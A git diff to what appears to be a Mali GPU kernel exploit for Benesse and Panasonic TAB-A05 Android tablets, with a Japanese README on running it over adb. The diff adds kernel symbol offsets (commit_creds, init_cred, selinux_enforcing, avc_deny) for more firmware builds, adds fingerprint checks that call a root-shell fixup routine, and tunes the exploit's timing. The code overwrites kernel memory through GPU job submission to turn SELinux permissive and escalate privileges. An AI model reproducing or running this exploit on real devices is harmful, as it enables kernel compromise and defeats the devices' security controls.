diff --git a/README.md b/README.md index a3316c4..9bfecf6 100644 --- a/README.md +++ b/README.md @@ -24,11 +24,7 @@ adb shell /data/local/tmp/shrinker > 途中でクラッシュしたり、無効な引数があると返される場合があります。 > 残念ながら**仕様**なので、根気強く何度も挑戦して下さい。 -一番最後に **`result 49`** と返ってきたら、 -``` -adb shell getenforce -``` -結果が **`Permissive`** と返って来る事を確認して下さい。 +一番最後に **`Permissive`** と返ってきたら、 エクスプロイトの実行は成功です。
TAB-A05-BD 01.11.000 での実行コード @@ -65,7 +61,6 @@ run_enforce_un: open run_enforce_un: after read run_enforce_un: after close result 49 -TAB-A05-BD:/ $ getenforce Permissive ```
@@ -82,6 +77,9 @@ Permissive > [!IMPORTANT] > SELinux が **`Permissive`** の状態の端末を使用してください。 +> [!TIP] +> [**EasyBLU**](https://github.com/Kobold831/EasyBLU) を用いると簡単です。 + 始めに、[**DchaServiceTester**](https://github.com/s1204IT/DchaServiceTester/releases/latest) をインストールしてください。 インストールが終わり次第、アプリを起動し、**`copyUpdateImage`** を選択して下さい。 diff --git a/mali_shrinker_mmap32.c b/mali_shrinker_mmap32.c index c4f8b73..342dd83 100644 --- a/mali_shrinker_mmap32.c +++ b/mali_shrinker_mmap32.c @@ -76,18 +76,57 @@ Search: sel_read_enforce -> SELINUX_ENFORCING = ldr - KERNEL_BASE Need: ARM to HEX -ADD_COMMIT = add x8, x8, #0x(Last 3 digits of INIT_CRED) ADD_INIT = add x0, x0, #0x(Last 3 digits of INIT_CRED) +ADD_COMMIT = add x8, x8, #0x(Last 3 digits of COMMIT_CRED) */ /* * Maintained by Syuugo */ +// TAB-A05-BD 00.04.000 +#define COMMIT_CREDS_CTX_00_04_000 0x5a120 +#define AVC_DENY_CTX_00_04_000 0x35acc8 +#define SEL_READ_ENFORCE_CTX_00_04_000 0x3653a8 +#define SEL_READ_HANDLE_UNKNOWN_CTX_00_04_000 0x365d80 +#define INIT_CRED_CTX_00_04_000 0x11553f0 +#define SELINUX_ENFORCING_CTX_00_04_000 0x129d9bc +#define ADD_INIT_CTX_00_04_000 0x910fc000 +#define ADD_COMMIT_CTX_00_04_000 0x91048108 + +// TAB-A05-BD 00.05.000 +#define COMMIT_CREDS_CTX_00_05_000 0x5a120 +#define AVC_DENY_CTX_00_05_000 0x35acc8 +#define SEL_READ_ENFORCE_CTX_00_05_000 0x3653a8 +#define SEL_READ_HANDLE_UNKNOWN_CTX_00_05_000 0x365d80 +#define INIT_CRED_CTX_00_05_000 0x11553f0 +#define SELINUX_ENFORCING_CTX_00_05_000 0x129d9bc +#define ADD_INIT_CTX_00_05_000 0x910fc000 +#define ADD_COMMIT_CTX_00_05_000 0x91048108 + +// TAB-A05-BD 00.08.000 +#define COMMIT_CREDS_CTX_00_08_000 0x5a120 +#define AVC_DENY_CTX_00_08_000 0x35acc8 +#define SEL_READ_ENFORCE_CTX_00_08_000 0x3653a8 +#define SEL_READ_HANDLE_UNKNOWN_CTX_00_08_000 0x365d80 +#define INIT_CRED_CTX_00_08_000 0x11553f0 +#define SELINUX_ENFORCING_CTX_00_08_000 0x129d9bc +#define ADD_INIT_CTX_00_08_000 0x910fc000 +#define ADD_COMMIT_CTX_00_08_000 0x91048108 + +// TAB-A05-BD 00.09.000 +#define COMMIT_CREDS_CTX_00_09_000 0x5a120 +#define AVC_DENY_CTX_00_09_000 0x35acc8 +#define SEL_READ_ENFORCE_CTX_00_09_000 0x3653a8 +#define SEL_READ_HANDLE_UNKNOWN_CTX_00_09_000 0x365d80 +#define INIT_CRED_CTX_00_09_000 0x11553f0 +#define SELINUX_ENFORCING_CTX_00_09_000 0x129d9bc +#define ADD_INIT_CTX_00_09_000 0x910fc000 +#define ADD_COMMIT_CTX_00_09_000 0x91048108 + // TAB-A05-BD 01.00.000 #define COMMIT_CREDS_CTX_01_00_000 0x5a120 #define AVC_DENY_CTX_01_00_000 0x35acc8 -#define SELINUX_ENFORCING_CTX_01_00_000 0x129d9bc #define SEL_READ_ENFORCE_CTX_01_00_000 0x3653a8 #define SEL_READ_HANDLE_UNKNOWN_CTX_01_00_000 0x365d80 #define INIT_CRED_CTX_01_00_000 0x11553f0 @@ -125,6 +164,16 @@ ADD_INIT = add x0, x0, #0x(Last 3 digits of INIT_CRED) #define ADD_INIT_CTX_01_11_000 0x910fc000 #define ADD_COMMIT_CTX_01_11_000 0x91048108 +// TAB-A05-BA1 00.03.000 +#define COMMIT_CREDS_CTZ_00_03_000 0x5a120 +#define AVC_DENY_CTZ_00_03_000 0x359c20 +#define SEL_READ_ENFORCE_CTZ_00_03_000 0x364370 +#define SEL_READ_HANDLE_UNKNOWN_CTZ_00_03_000 0x364d48 +#define INIT_CRED_CTZ_00_03_000 0x11753f0 +#define SELINUX_ENFORCING_CTZ_00_03_000 0x12e49bc +#define ADD_INIT_CTZ_00_03_000 0x910fc000 +#define ADD_COMMIT_CTZ_00_03_000 0x91048108 + // TAB-A05-BA1 01.00.000 #define COMMIT_CREDS_CTZ_01_00_000 0x5a120 #define AVC_DENY_CTZ_01_00_000 0x359c20 @@ -181,8 +230,8 @@ static uint64_t selinux_enforcing; //static uint64_t avc_deny = 0x2CCC28; static uint64_t avc_deny; -static uint64_t selinux_enforcing_READ = 0X0; -static uint64_t selinux_enforcing_WRITE = 0X0; +static uint64_t selinux_enforcing_READ = 0x0; +static uint64_t selinux_enforcing_WRITE = 0x0; /* Overwriting SELinux to permissive strb wzr, [x0] @@ -634,7 +683,7 @@ void write_to(int mali_fd, uint64_t gpu_addr, uint64_t value, int atom_number, e if (ioctl(mali_fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) { err(1, "submit job failed\n"); } - usleep(300000); + usleep(100000); } void write_data(int mali_fd, uint64_t data, uint64_t* reserved, uint64_t size, uint64_t value, enum mali_write_value_type type) { @@ -651,7 +700,7 @@ void write_data(int mali_fd, uint64_t data, uint64_t* reserved, uint64_t size, u LOG("write_data overwrite addr : %llx %llx\n", overwrite_addr + data_offset, data_offset); curr_overwrite_addr = overwrite_addr; write_to(mali_fd, overwrite_addr + data_offset, value, atom_number++, type); - usleep(300000); + usleep(100000); } } } @@ -659,7 +708,7 @@ void write_data(int mali_fd, uint64_t data, uint64_t* reserved, uint64_t size, u void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, uint32_t* shellcode, uint64_t code_size) { printf("write_func called with code_size = %llu\n", code_size); - usleep(300000); + usleep(100000); uint64_t func_offset = (func + KERNEL_BASE) % 0x1000; uint64_t curr_overwrite_addr = 0; for (int i = 0; i < size; i++) { @@ -675,7 +724,7 @@ void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, u for (int code = code_size - 1; code >= 0; code--) { write_to(mali_fd, overwrite_addr + func_offset + code * 4, shellcode[code], atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_32); } - usleep(300000); + usleep(100000); } } } @@ -684,7 +733,7 @@ void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, u int run_enforce() { char result = '2'; printf("run_enforce: before sleep\n"); - sleep(3); + sleep(2); printf("run_enforce: after sleep\n"); int enforce_fd = open("/sys/fs/selinux/enforce", O_RDONLY); printf("run_enforce: open\n"); @@ -712,7 +761,7 @@ int run_enforce_write() { int run_enforce_un() { char result = '2'; printf("run_enforce_un: before sleep\n"); - sleep(3); + sleep(2); printf("run_enforce_un: after sleep\n"); int enforce_fd = open("/sys/fs/selinux/deny_unknown", O_RDONLY); printf("run_enforce_un: open\n"); @@ -729,6 +778,34 @@ void select_offset() { int len = __system_property_get("ro.build.fingerprint", fingerprint); LOG("fingerprint: %s\n", fingerprint); + if (!strcmp(fingerprint, "benesse/TAB-A05-BD/TAB-A05-BD:9/00.04.000/00.04.000:user/release-keys")) { + selinux_enforcing = SELINUX_ENFORCING_CTX_00_04_000; + sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_CTX_00_04_000; + fixup_root_shell(INIT_CRED_CTX_00_04_000, COMMIT_CREDS_CTX_00_04_000, SEL_READ_HANDLE_UNKNOWN_CTX_00_04_000, ADD_INIT_CTX_00_04_000, ADD_COMMIT_CTX_00_04_000); + return; + } + + if (!strcmp(fingerprint, "benesse/TAB-A05-BD/TAB-A05-BD:9/00.05.000/00.05.000:user/release-keys")) { + selinux_enforcing = SELINUX_ENFORCING_CTX_00_05_000; + sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_CTX_00_05_000; + fixup_root_shell(INIT_CRED_CTX_00_05_000, COMMIT_CREDS_CTX_00_05_000, SEL_READ_HANDLE_UNKNOWN_CTX_00_05_000, ADD_INIT_CTX_00_05_000, ADD_COMMIT_CTX_00_05_000); + return; + } + + if (!strcmp(fingerprint, "benesse/TAB-A05-BD/TAB-A05-BD:9/00.08.000/00.08.000:user/release-keys")) { + selinux_enforcing = SELINUX_ENFORCING_CTX_00_08_000; + sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_CTX_00_08_000; + fixup_root_shell(INIT_CRED_CTX_00_08_000, COMMIT_CREDS_CTX_00_08_000, SEL_READ_HANDLE_UNKNOWN_CTX_00_08_000, ADD_INIT_CTX_00_08_000, ADD_COMMIT_CTX_00_08_000); + return; + } + + if (!strcmp(fingerprint, "benesse/TAB-A05-BD/TAB-A05-BD:9/00.09.000/00.09.000:user/release-keys")) { + selinux_enforcing = SELINUX_ENFORCING_CTX_00_09_000; + sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_CTX_00_09_000; + fixup_root_shell(INIT_CRED_CTX_00_09_000, COMMIT_CREDS_CTX_00_09_000, SEL_READ_HANDLE_UNKNOWN_CTX_00_09_000, ADD_INIT_CTX_00_09_000, ADD_COMMIT_CTX_00_09_000); + return; + } + if (!strcmp(fingerprint, "benesse/TAB-A05-BD/TAB-A05-BD:9/01.00.000/01.00.000:user/release-keys")) { selinux_enforcing = SELINUX_ENFORCING_CTX_01_00_000; sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_CTX_01_00_000; @@ -757,6 +834,13 @@ void select_offset() { return; } + if (!strcmp(fingerprint, "Panasonic/TAB-A05-BA1/TAB-A05-BA1:9/00.03.000/00.03.000:user/release-keys")) { + selinux_enforcing = SELINUX_ENFORCING_CTZ_00_03_000; + sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_CTZ_00_03_000; + fixup_root_shell(INIT_CRED_CTZ_00_03_000, COMMIT_CREDS_CTZ_00_03_000, SEL_READ_HANDLE_UNKNOWN_CTZ_00_03_000, ADD_INIT_CTZ_00_03_000, ADD_COMMIT_CTZ_00_03_000); + return; + } + if (!strcmp(fingerprint, "Panasonic/TAB-A05-BA1/TAB-A05-BA1:9/01.00.000/01.00.000:user/release-keys")) { selinux_enforcing = SELINUX_ENFORCING_CTZ_01_00_000; sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_CTZ_01_00_000; @@ -803,7 +887,7 @@ void write_selinux(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved) uint64_t selinux_enforcing_addr = (((selinux_enforcing + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443; write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), selinux_enforcing_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64); - usleep(300000); + usleep(100000); // Go through the reserve pages addresses to write to avc_denied with our own shellcode write_data(mali_fd2, selinux_enforcing, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, 0, MALI_WRITE_VALUE_TYPE_IMMEDIATE_32); } @@ -947,7 +1031,7 @@ int main() { int flush_idx = 0; for (int i = 0; i < 10; i++) { if(!trigger(mali_fd, mali_fd2, &flush_idx)) { - system("sh"); + system("getenforce"); break; } }